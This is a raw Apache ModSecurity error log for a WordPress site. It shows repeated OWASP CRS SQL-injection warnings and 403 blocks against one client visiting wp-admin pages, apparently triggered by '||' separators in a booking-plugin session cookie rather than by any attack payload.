[Mon May 11 18:35:19.768048 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFRw-Qm4vhlWBPlMjnCwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:19.768351 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFRw-Qm4vhlWBPlMjnCwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:20.132809 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFRw-Qm4vhlWBPlMjnCwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:21.079361 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFSQ-Qm4vhlWBPlMjnDQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:21.079642 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFSQ-Qm4vhlWBPlMjnDQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:21.696271 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFSQ-Qm4vhlWBPlMjnDQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:21.986629 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFSQ-Qm4vhlWBPlMjnDwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:21.986917 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFSQ-Qm4vhlWBPlMjnDwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:22.961869 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFSQ-Qm4vhlWBPlMjnDwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:23.185563 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFSw-Qm4vhlWBPlMjnFwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:23.185851 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFSw-Qm4vhlWBPlMjnFwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:23.853138 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFSw-Qm4vhlWBPlMjnFwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:24.466577 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFTA-Qm4vhlWBPlMjnGgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:24.466885 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFTA-Qm4vhlWBPlMjnGgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:25.196255 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFTA-Qm4vhlWBPlMjnGgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:25.298868 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFTQ-Qm4vhlWBPlMjnHgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:25.299164 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFTQ-Qm4vhlWBPlMjnHgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:25.988425 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFTQ-Qm4vhlWBPlMjnHgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:26.300744 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFTg-Qm4vhlWBPlMjnIAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:26.301030 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFTg-Qm4vhlWBPlMjnIAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:26.825370 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFTg-Qm4vhlWBPlMjnIAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:27.421435 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFTw-Qm4vhlWBPlMjnIQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:27.421713 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFTw-Qm4vhlWBPlMjnIQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:28.242335 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFTw-Qm4vhlWBPlMjnIQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:28.605379 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFUA-Qm4vhlWBPlMjnIwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:28.605664 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFUA-Qm4vhlWBPlMjnIwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:29.224214 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFUA-Qm4vhlWBPlMjnIwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:29.959735 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFUQ-Qm4vhlWBPlMjnJQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:29.960081 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFUQ-Qm4vhlWBPlMjnJQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:30.647943 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFUQ-Qm4vhlWBPlMjnJQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:30.946106 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFUg-Qm4vhlWBPlMjnJgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:30.946422 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFUg-Qm4vhlWBPlMjnJgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:31.529995 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFUg-Qm4vhlWBPlMjnJgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:31.642800 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFUw-Qm4vhlWBPlMjnKAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:31.643077 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFUw-Qm4vhlWBPlMjnKAAAAAc"], referer: https://rentparadise.fr/wp-login.php
